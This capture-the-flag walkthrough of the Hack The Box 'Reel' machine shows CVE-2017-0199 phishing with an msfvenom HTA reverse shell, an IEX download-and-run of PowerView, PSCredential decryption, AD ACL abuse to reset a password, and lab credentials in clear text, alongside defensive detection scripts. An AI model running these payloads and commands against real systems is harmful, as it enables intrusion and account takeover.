Reel HTB

IP

10.129.34.39

Initial nmap scan

sudo nmap -p- --min-rate 10000 10.129.34.39 | grep open | cut -d"/" -f1 | tr '\n' ','

We have the following ports open on the target:

21,22,25,135,139,445,593,49159

Let's run a more in-depth scan of the open ports:

sudo nmap -sCV -p21,22,25,135,139,445,593,49159 -oA TCP_ports 10.129.34.39

Results

PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-28-18  11:19PM       <DIR>          documents
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
|   256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_  256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp    open  smtp?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe: 
|     220 Mail Service ready
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|   Hello: 
|     220 Mail Service ready
|     EHLO Invalid domain address.
|   Help: 
|     220 Mail Service ready
|     DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|   SIPOptions: 
|     220 Mail Service ready
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|     sequence of commands
|   TerminalServerCookie: 
|     220 Mail Service ready
|_    sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port25-TCP:V=7.94%I=7%D=1/16%Time=65A61895%P=x86_64-pc-linux-gnu%r(NULL
SF:,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Hello,3A,"220\x20Mail\x20S
SF:ervice\x20ready\r\n501\x20EHLO\x20Invalid\x20domain\x20address\.\r\n")%
SF:r(Help,54,"220\x20Mail\x20Service\x20ready\r\n211\x20DATA\x20HELO\x20EH
SF:LO\x20MAIL\x20NOOP\x20QUIT\x20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n"
SF:)%r(GenericLines,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20s
SF:equence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r
SF:\n")%r(GetRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x20
SF:sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\
SF:r\n")%r(HTTPOptions,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad\x
SF:20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n")%r(RTSPRequest,54,"220\x20Mail\x20Service\x20ready\r\n503\x20Bad
SF:\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comma
SF:nds\r\n")%r(RPCCheck,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSVer
SF:sionBindReqTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(DNSStatusReq
SF:uestTCP,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SSLSessionReq,18,"2
SF:20\x20Mail\x20Service\x20ready\r\n")%r(TerminalServerCookie,36,"220\x20
SF:Mail\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\
SF:n")%r(TLSSessionReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(Kerbero
SF:s,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SMBProgNeg,18,"220\x20Mai
SF:l\x20Service\x20ready\r\n")%r(X11Probe,18,"220\x20Mail\x20Service\x20re
SF:ady\r\n")%r(FourOhFourRequest,54,"220\x20Mail\x20Service\x20ready\r\n50
SF:3\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\
SF:x20commands\r\n")%r(LPDString,18,"220\x20Mail\x20Service\x20ready\r\n")
SF:%r(LDAPSearchReq,18,"220\x20Mail\x20Service\x20ready\r\n")%r(LDAPBindRe
SF:q,18,"220\x20Mail\x20Service\x20ready\r\n")%r(SIPOptions,162,"220\x20Ma
SF:il\x20Service\x20ready\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n5
SF:03\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of
SF:\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\
SF:x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20comman
SF:ds\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequenc
SF:e\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n503\
SF:x20Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x2
SF:0commands\r\n");
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-01-16T05:51:02
|_  start_date: 2024-01-16T05:41:44
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
|   OS CPE: cpe:/o:microsoft:windows_server_2012::-
|   Computer name: REEL
|   NetBIOS computer name: REEL\x00
|   Domain name: HTB.LOCAL
|   Forest name: HTB.LOCAL
|   FQDN: REEL.HTB.LOCAL
|_  System time: 2024-01-16T05:50:58+00:00
|_clock-skew: mean: -4s, deviation: 0s, median: -5s
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 234.68 seconds

Looking at the results:

  • Windows Server 2012 R2 Standard 9600

  • FTP is enabled and allows anonymous authentication

  • SSH is enabled (haven't seen that on a Windows box before)

  • SMB is enabled

  • We have both the domain name HTB.LOCAL and the computer name REEL; we will add these to our /etc/hosts file

  • SMTP is possibly enabled; we will check this out

  • RPC

  • NetBIOS

Let's start with FTP:

ftp anonymous@10.129.34.39

We find the directory documents, which contains 3 files.

After downloading the files, I noticed I had problems trying to download the "Windows Event Forwarding.docx" file, but switching to binary mode in ftp fixed the problem:

binary
get Windows\ Event\ Forwarding.docx

readme.txt

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.
  • Short message, a possible hint of what kind of documents will be read here

  • Maybe we have to construct some sort of phishing email?

  • More specifically, what is RTF?

    • The Rich Text Format: these files are essentially text files, but have the capability of storing extra information such as font style, formatting, images, etc.

AppLocker.docx

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
  • Short message, but could be handy to know when we get code execution

Windows Event Forwarding.docx

  • A longer document; its contents are below

# get winrm config

winrm get winrm/config


# gpo config

O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS)		// add to GPO
Server=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60	// add to GPO (60 seconds)

on source computer: gpupdate /force

# prereqs

start Windows Remote Management service on source computer
add builtin\network service account to "Event Log Readers" group on collector server

# list subscriptions / export

C:\Windows\system32>wecutil es > subs.txt

# check subscription status

C:\Windows\system32>wecutil gr "Account Currently Disabled"

Subscription: Account Currently Disabled
        RunTimeStatus: Active
        LastError: 0
        EventSources:
                LAPTOP12.HTB.LOCAL
                        RunTimeStatus: Active
                        LastError: 0
                        LastHeartbeatTime: 2017-07-11T13:27:00.920


# change pre-rendering setting in multiple subscriptions

for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events


# export subscriptions to xml

for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"

# import subscriptions from xml

wecutil cs "Event Log Service Shutdown.xml"
wecutil cs "Event Log was cleared.xml"

# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any hard running command even if they already are in this format)

1.

for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events

2.

Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"

# check subscriptions are being created on the source computer

Event Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational


#### troubleshooting WEF

collector server -> subscription name -> runtime status

gpupdate /force (force checkin, get subscriptions)

check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors

Checking the metadata:

exiftool Windows\ Event\ Forwarding.docx

We find a possible user on the system:

nico@megabank.com

SMTP enumeration

Notice in our nmap scan that the following SMTP commands are enabled: DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

Since RCPT TO is accepted, we should be able to confirm whether the email address we found, nico@megabank.com, exists on the SMTP server:

telnet 10.129.34.39 25
Trying 10.129.34.39...
Connected to 10.129.34.39.
Escape character is '^]'.
220 Mail Service ready
HELO shrek123@shrek123
250 Hello.
MAIL FROM: <shrek123@shrek123
550 Invalid syntax. Syntax should be MAIL FROM:<mailbox@domain>[crlf]
Mail FROM: <shrek123@shrek123>
250 OK
RCPT TO: <nico@megabank.com>
250 OK

We have now confirmed that nico@megabank.com is a valid recipient on the SMTP server. Okay, so what now?
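The RCPT TO check above is exactly what this probing looks like from the mail server's side. As an added example (not part of the original writeup), here is a Python script that runs simple detection logic over a few constructed SMTP log lines: it flags a client that tests several recipients without ever sending a message, collects repeated rejections, or uses VRFY/EXPN. The log format ("timestamp client-ip command response-code"), the second client's IP and the probe threshold are assumptions made for the sample.

```python
import re
from collections import defaultdict

# Constructed sample log (format assumed: "<timestamp> <client-ip> <command> <response-code>").
# The first client probes four recipients and never sends mail; the second sends one normal message.
SAMPLE_SMTP_LOG = """\
2024-01-16T05:52:01Z 10.10.16.3 HELO shrek123@shrek123 250
2024-01-16T05:52:02Z 10.10.16.3 MAIL FROM:<shrek123@shrek123> 250
2024-01-16T05:52:03Z 10.10.16.3 RCPT TO:<nico@megabank.com> 250
2024-01-16T05:52:04Z 10.10.16.3 RCPT TO:<tom@megabank.com> 550
2024-01-16T05:52:05Z 10.10.16.3 RCPT TO:<claire@megabank.com> 550
2024-01-16T05:52:06Z 10.10.16.3 RCPT TO:<admin@megabank.com> 550
2024-01-16T05:52:07Z 10.10.16.3 VRFY administrator 252
2024-01-16T05:52:08Z 10.10.16.3 QUIT 221
2024-01-16T06:10:00Z 10.129.34.50 HELO laptop12.htb.local 250
2024-01-16T06:10:01Z 10.129.34.50 MAIL FROM:<tom@megabank.com> 250
2024-01-16T06:10:02Z 10.129.34.50 RCPT TO:<nico@megabank.com> 250
2024-01-16T06:10:03Z 10.129.34.50 DATA 354
2024-01-16T06:10:04Z 10.129.34.50 QUIT 221
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\S+) (?P<cmd>[A-Z]+)(?: (?P<arg>.*?))? (?P<code>\d{3})$"
)


def analyze_smtp_log(lines, probe_threshold=3):
    """Per client: distinct RCPT TO recipients, how many the server rejected (5xx),
    VRFY/EXPN use, and whether a message body (DATA) was ever sent. Returns
    {client_ip: [reason, ...]} for the clients worth looking at."""
    stats = defaultdict(lambda: {"recipients": set(), "rejected": 0, "vrfy_expn": 0, "data": 0})
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # constructed format only; lines that do not parse are skipped
        st = stats[m["ip"]]
        cmd, arg, code = m["cmd"], m["arg"] or "", m["code"]
        if cmd == "RCPT":
            addr = re.search(r"<([^>]+)>", arg)
            if addr:
                st["recipients"].add(addr.group(1).lower())
            if code.startswith("5"):
                st["rejected"] += 1
        elif cmd in ("VRFY", "EXPN"):
            st["vrfy_expn"] += 1
        elif cmd == "DATA":
            st["data"] += 1

    findings = {}
    for ip, st in stats.items():
        reasons = []
        # address harvesting: many recipients tried, no message ever sent
        if len(st["recipients"]) >= probe_threshold and st["data"] == 0:
            reasons.append(f"{len(st['recipients'])} recipients probed, no message sent")
        if st["rejected"] >= 2:
            reasons.append(f"{st['rejected']} recipients rejected by the server")
        if st["vrfy_expn"]:
            reasons.append(f"{st['vrfy_expn']} VRFY/EXPN command(s)")
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in analyze_smtp_log(SAMPLE_SMTP_LOG.splitlines()).items():
        print(ip, "->", "; ".join(reasons))
```

The usual hardening on the server side is to disable VRFY and EXPN (the banner above advertises VRFY), to answer RCPT TO identically for known and unknown local recipients so the reply no longer confirms an address, and to rate-limit clients that rack up rejections.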

Alright, we have:

  • an email address within the SMTP server

  • a readme.txt saying "please email me any rtf format procedures - I'll review and convert", so someone is expecting emails with RTF attachments

  • using searchsploit we find something interesting, CVE-2017-0199; given the machine was created in 2018, this is the most likely intended foothold

  • it also gives us a GitHub link to an exploit toolkit for it

To exploit CVE-2017-0199, we need to get a user on the system to open our malicious RTF file, which in turn makes an HTTP request for an HTA file; we want that HTA file to execute a reverse shell on the target machine.

Let's walk through the steps:

  1. We want to generate a malicious HTA file that will execute on the system, giving us a reverse shell

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.3 LPORT=9010 -f hta-psh -o pickmeup.hta

  2. Now we can create a malicious RTF file using the git repo above, with the following options

python cve-2017-0199_toolkit.py -M gen -w whatAreYouWaiting4.rtf -u http://10.10.16.3/pickmeup.hta -t rtf -x 0

  • -M gen: generate document

  • -w whatAreYouWaiting4.rtf: output file name

  • -u http://10.10.16.3/pickmeup.hta: URL to pick up the payload from

  • -t rtf: create an RTF file

  • -x 0: disable RTF obfuscation

  3. Set up a netcat listener

rlwrap -cAr nc -lvnp 9010

  4. Start a Python web server with our payload in it

python3 -m http.server 80

  5. Now we just need to send the email

sendEmail -f shrek123@megabank.com -t nico@megabank.com -u "Are you going to read me???" -m "So you did read me mwah ha ha" -a whatAreYouWaiting4.rtf -s 10.129.34.39 -v

  • -f: from address, sending from the same domain to be safe

  • -t: to address, nico@megabank.com

  • -u: subject

  • -m: body

  • -a: attachment

  • -s: SMTP server

  • -v: verbose

After waiting about 20 seconds we have a shell on the system.
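From the defender's side, the attachment sent above is what a mail gateway or sandbox needs to catch. As an added example that is not part of the writeup or of the toolkit, here is a Python scanner for the indicators public detection rules key on for CVE-2017-0199 documents: an embedded object marked \objautlink and \objupdate (so Word refreshes the link when the file opens) whose \objdata hex carries the URL Moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}. The writeup turned the toolkit's RTF obfuscation off with -x 0; obfuscated variants commonly scatter whitespace and ignorable control words through the hex data, so the scanner normalises the data before matching, and a plain substring search for the CLSID would miss the sample. Both RTF strings are constructed; the suspect one is only the control-word skeleton with the CLSID bytes inside truncated filler, not a working document.

```python
import re

# URL Moniker CLSID {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B} as it appears in the
# little-endian, hex-encoded \objdata stream of a linked OLE object
URL_MONIKER_CLSID_HEX = "e0c9ea79f9bace118c8200aa004ba90b"

# Constructed samples. BENIGN_RTF is an ordinary document. SUSPECT_RTF is only the
# control-word skeleton of an auto-updating link object; its object data is filler
# around the CLSID bytes, split by newlines, spaces and a stray control word the way
# an obfuscator would split it. It is not a working document.
BENIGN_RTF = r"{\rtf1\ansi{\fonttbl{\f0 Calibri;}}\f0 Quarterly procedures, nothing embedded.\par}"
SUSPECT_RTF = (
    r"{\rtf1{\object\objautlink\objupdate{\*\objdata 0105000002000000" "\n"
    r"e0c9 ea79" "\n" r"\dummy f9ba ce11 8c82 00aa 004b a90b 00000000}}}"
)


def _group_body(rtf, start):
    """Text from `start` up to the '}' that closes the enclosing RTF group."""
    depth = 0
    for i in range(start, len(rtf)):
        if rtf[i] == "{":
            depth += 1
        elif rtf[i] == "}":
            if depth == 0:
                return rtf[start:i]
            depth -= 1
    return rtf[start:]


def extract_objdata_hex(rtf):
    """Hex payload of every \\objdata destination, with interleaved control words,
    whitespace and any other non-hex noise stripped so obfuscated data compares equal."""
    payloads = []
    for m in re.finditer(r"\\objdata\b", rtf):
        body = _group_body(rtf, m.end())
        body = re.sub(r"\\[A-Za-z]+-?\d* ?", "", body)  # drop control words sprinkled into the hex
        payloads.append(re.sub(r"[^0-9A-Fa-f]", "", body).lower())
    return payloads


def scan_rtf(rtf):
    """Return the CVE-2017-0199 style indicators found in an RTF string."""
    result = {
        "objautlink": re.search(r"\\objautlink\b", rtf) is not None,
        "objupdate": re.search(r"\\objupdate\b", rtf) is not None,
        "url_moniker": any(URL_MONIKER_CLSID_HEX in h for h in extract_objdata_hex(rtf)),
    }
    # a link object that auto-updates on open is the combination that fetches a remote payload
    result["suspicious"] = result["objupdate"] and result["url_moniker"]
    return result


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_RTF), ("suspect", SUSPECT_RTF)):
        print(name, scan_rtf(sample))
    # a naive substring search misses the obfuscated sample
    print("naive grep finds CLSID:", URL_MONIKER_CLSID_HEX in SUSPECT_RTF)
```

On the endpoint the complementary control is the one the AppLocker.docx hints at: its hash rules cover exe, msi and the listed script types, and a policy that also covers what the HTA payload above relies on (mshta.exe and the scripting hosts) would have stopped the second stage even if the document got through.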

Priv Esc via nico

Looking through nico's desktop we see an interesting file, cred.xml:

C:\Users\nico\Desktop>type cred.xml
type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>

We have a serialized XML (CliXml) representation of a PSCredential object for the user HTB\Tom.

The password is a SecureString protected with DPAPI under the account that exported it, so the decryption has to run on this host as that user (it works as nico):

powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

Let's break down this one-liner:

  • powershell -c: tells PowerShell to execute the command string that follows

  • $cred = Import-CliXml -Path cred.xml: imports cred.xml and assigns the result to the variable $cred; the Import-CliXml cmdlet deserializes the XML content into a PowerShell object, in this case our PSCredential object

  • $cred.GetNetworkCredential() | Format-List *: calls the GetNetworkCredential() method on the $cred object, which returns the underlying NetworkCredential with the password in plain text; its output is piped to Format-List *, which displays all the properties of the object in list format

We are now left with a cleartext password:

Tom: 1ts-mag1c!!!
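Why that one-liner works for nico and would fail for anyone else: the <SS> element is a SecureString that Export-CliXml protects with DPAPI under the exporting user's profile on that machine, so it can only be decrypted with that user's DPAPI master key. As an added Python example (not from the writeup), this parser reads the cred.xml shown above, pulls the user name out of the PSCredential and checks that the protected value carries the DPAPI blob header (version 1 followed by the DPAPI provider GUID {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian order), which tells an analyst which account's credential the file exposes and whose key it is bound to.

```python
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"

# A DPAPI blob starts with a 4-byte version (1) followed by the DPAPI provider GUID
# {df9d8cd0-1501-11d1-8c7a-00c04fc297eb} in little-endian byte order
DPAPI_BLOB_PREFIX = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# The cred.xml found on nico's desktop, as shown in the writeup
CRED_XML = r"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>"""


def parse_clixml_credentials(xml_text):
    """One record per serialized PSCredential: the user name, the protected
    password value, and whether that value is a DPAPI blob (bound to the
    exporting user's master key) rather than something portable."""
    root = ET.fromstring(xml_text)
    records = []
    for obj in root.iter(PS_NS + "Obj"):
        type_names = {t.text for t in obj.iter(PS_NS + "T")}
        if "System.Management.Automation.PSCredential" not in type_names:
            continue
        record = {"username": None, "protected": None, "dpapi": False}
        for prop in obj.iter(PS_NS + "S"):        # plain string properties
            if prop.get("N") == "UserName":
                record["username"] = prop.text
        for prop in obj.iter(PS_NS + "SS"):       # SecureString properties
            if prop.get("N") == "Password":
                record["protected"] = prop.text.strip()
                record["dpapi"] = record["protected"].lower().startswith(DPAPI_BLOB_PREFIX)
        records.append(record)
    return records


if __name__ == "__main__":
    for rec in parse_clixml_credentials(CRED_XML):
        scope = "DPAPI (user-bound, decrypt as exporting user on this host)" if rec["dpapi"] else "not DPAPI"
        print(f"{rec['username']}: {scope}, {len(rec['protected']) // 2} bytes")
```

A SecureString converted with ConvertFrom-SecureString -Key or -SecureKey is AES with a caller-supplied key instead, so the header check reports dpapi False for it and the value would be portable to any machine that has the key; that distinction is what decides whether a stray cred.xml is a problem only for the one account, or for anyone who finds the key.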

We saw SSH during our enumeration; maybe we can SSH in as tom:

ssh tom@10.129.34.39
  • it works

Priv Esc via Tom

We find some interesting files on Tom's desktop.

note.txt

Findings:

Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).

Maybe we should re-run Cypher query against other groups we've created.

Within C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

we find the file acls.csv; let's use scp to copy the file onto our local host:

scp tom@10.129.34.39:"C:/Users/tom/Desktop/AD Audit/BloodHound/Ingestors/acls.csv" ./

  • I'm not a massive fan of this layout in a CSV file; there's gotta be a better way to view this data

Let's set up dynamic port forwarding and see if we can get bloodhound-python to enumerate the domain through it:

  1. Establish the dynamic port forward; for this we will use plink

plink -ssh tom@10.129.34.39 -P 22 -D 9000 -pw "1ts-mag1c\!\!\!"

  • -ssh: specifies that the connection should use the SSH protocol

  • tom@10.129.34.39: the SSH user and host to connect as

  • -P 22: specifies the port number (22) on the SSH server to connect to; the default SSH port is 22

  • -D 9000: specifies dynamic port forwarding on the local machine; this sets up a SOCKS proxy on port 9000 on the local machine

  • -pw "1ts-mag1c\!\!\!": specifies the password (1ts-mag1c!!!) for the SSH user

  2. Next we need to point our proxychains.conf at the SOCKS proxy on port 9000

  3. We should now be able to run bloodhound-python through our SOCKS proxy and reach the ports that are only listening internally

proxychains bloodhound-python -u tom -p '1ts-mag1c!!!' -ns 10.129.34.39 -d htb.local -c all --dns-tcp
  • proxychains: This command to proxy the traffic generated by bloodhound-python through a SOCKS proxy.

  • bloodhound-python: This is the BloodHound Python tool, which is used for Active Directory (AD) enumeration and analysis.

  • -u tom: Specifies the username (tom) for authenticating to the target Active Directory.

  • -p '1ts-mag1c!!!': Specifies the password (1ts-mag1c!!!) for the specified username.

  • -ns 10.129.34.39: Specifies the IP address of the domain controller or Active Directory server.

  • -d htb.local: Specifies the domain name (htb.local) of the Active Directory environment.

  • -c all: Specifies that all collection methods should be used.

  • --dns-tcp: Specifies the use of TCP for DNS queries. This can be useful when DNS over UDP is restricted or blocked.

Now that bloodhound-python has run successfully, we can ingest the data:

  1. Start neo4j

sudo neo4j console

  • log in

  2. Start up BloodHound

sudo bloodhound --nosandbox

We can mark our user TOM@HTB.LOCAL as owned; if we look at tom's "First Degree Object Control" we can see the following:

We have "WriteOwner" permission over CLAIRE@HTB.LOCAL, and CLAIRE@HTB.LOCAL has "GenericWrite" permission over the BACKUP_ADMINS group, meaning whoever controls claire can add members to the group.
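The two edges BloodHound drew here (WriteOwner on a user, GenericWrite on a group) are the kind an AD ACL audit should surface before anyone abuses them, and they are exactly what the note.txt above was getting at when it suggested querying other groups than Domain Admins. As an added example, not part of the writeup or of BloodHound, here is a Python script that reads ACL rows in the shape of the acls.csv export (column names are assumed; check them against the real file's header) and breadth-first searches from one principal to a target for a chain of control-granting rights. The rows are constructed to reproduce the tom -> claire -> BACKUP_ADMINS chain, plus an inherited Domain Admins ACE, a read-only ACE and a deny ACE that must not count.

```python
import csv
import io
from collections import defaultdict, deque

# Constructed rows in the shape of a BloodHound acls.csv export (column names assumed)
SAMPLE_ACLS_CSV = """\
ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights,AccessControlType,IsInherited
CLAIRE@HTB.LOCAL,USER,TOM@HTB.LOCAL,USER,WriteOwner,AccessAllowed,False
BACKUP_ADMINS@HTB.LOCAL,GROUP,CLAIRE@HTB.LOCAL,USER,GenericWrite,AccessAllowed,False
BACKUP_ADMINS@HTB.LOCAL,GROUP,TOM@HTB.LOCAL,USER,ReadProperty,AccessAllowed,False
CLAIRE@HTB.LOCAL,USER,DOMAIN ADMINS@HTB.LOCAL,GROUP,GenericAll,AccessAllowed,True
TOM@HTB.LOCAL,USER,CLAIRE@HTB.LOCAL,USER,WriteDacl,AccessDenied,False
"""

# Rights that let the principal take over the object; read-only rights are ignored
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteOwner", "WriteDacl",
                   "ForceChangePassword", "AllExtendedRights", "AddMember"}


def load_edges(csv_text):
    """principal -> [(object, right), ...] for allowed, control-granting ACEs."""
    edges = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["AccessControlType"] != "AccessAllowed":
            continue  # a deny ACE grants nothing
        # a row may carry several comma-separated rights inside one quoted cell
        for right in row["ActiveDirectoryRights"].split(","):
            right = right.strip()
            if right in TAKEOVER_RIGHTS:
                edges[row["PrincipalName"].upper()].append((row["ObjectName"].upper(), right))
    return edges


def find_path(edges, owned, target):
    """Shortest chain of takeover rights from `owned` to `target`, as a list of
    (principal, right, object) hops, or None if there is no such chain."""
    owned, target = owned.upper(), target.upper()
    queue = deque([(owned, [])])
    seen = {owned}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        for obj, right in edges.get(node, []):
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, path + [(node, right, obj)]))
    return None


def describe(path):
    """Render a path as 'A [right] -> B [right] -> C'."""
    return " -> ".join(f"{p} [{r}]" for p, r, _ in path) + f" -> {path[-1][2]}"


if __name__ == "__main__":
    edges = load_edges(SAMPLE_ACLS_CSV)
    path = find_path(edges, "tom@htb.local", "backup_admins@htb.local")
    print(describe(path) if path else "no path")
```

For the auditor the interesting output is every such path whose starting principal is not itself a privileged account: each hop names the ACE to remove (or the ownership to correct) to cut the chain, and rerunning the search after the change confirms the fix.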

  • Alright, we need to own the user account claire

  1. Let's load PowerView.ps1 onto the system

Start a Python web server on our local machine:

python3 -m http.server 80

Then on the target:

powershell.exe # start a PowerShell prompt
IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.3/PowerView/PowerView.ps1')

  2. Next we use our WriteOwner right to set tom as the owner of claire's object

Set-DomainObjectOwner -identity claire -OwnerIdentity tom

  3. As owner, tom can now grant himself the right to reset claire's password

Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

  4. Now we can create a SecureString in $cred and change claire's password

$cred = ConvertTo-SecureString "Password1" -AsPlainText -Force
Set-DomainUserPassword -identity claire -accountpassword $cred

Now we should be able to SSH into claire's account:

ssh claire@10.129.34.39
  • we are in

Alright, let's add claire to BACKUP_ADMINS

  1. We can use the net command

net group backup_admins claire /add

  2. Let's check who is in the group now

net group backup_admins

Now that claire is part of the BACKUP_ADMINS

  • Had to log out and back in for the changes to take effect, weird right?

let's check the permissions on the Administrator directory:

claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              HTB\Backup_Admins:(OI)(CI)(F)
              HTB\Administrator:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)

While trying to read the root.txt flag we get a big fat access denied.

But we do find a directory full of backup scripts; looking through them we come across a possible Administrator password:

Cr4ckMeIfYouC4n!

Let's see if we can SSH in as the Administrator:

ssh administrator@10.129.34.39
  • we are in
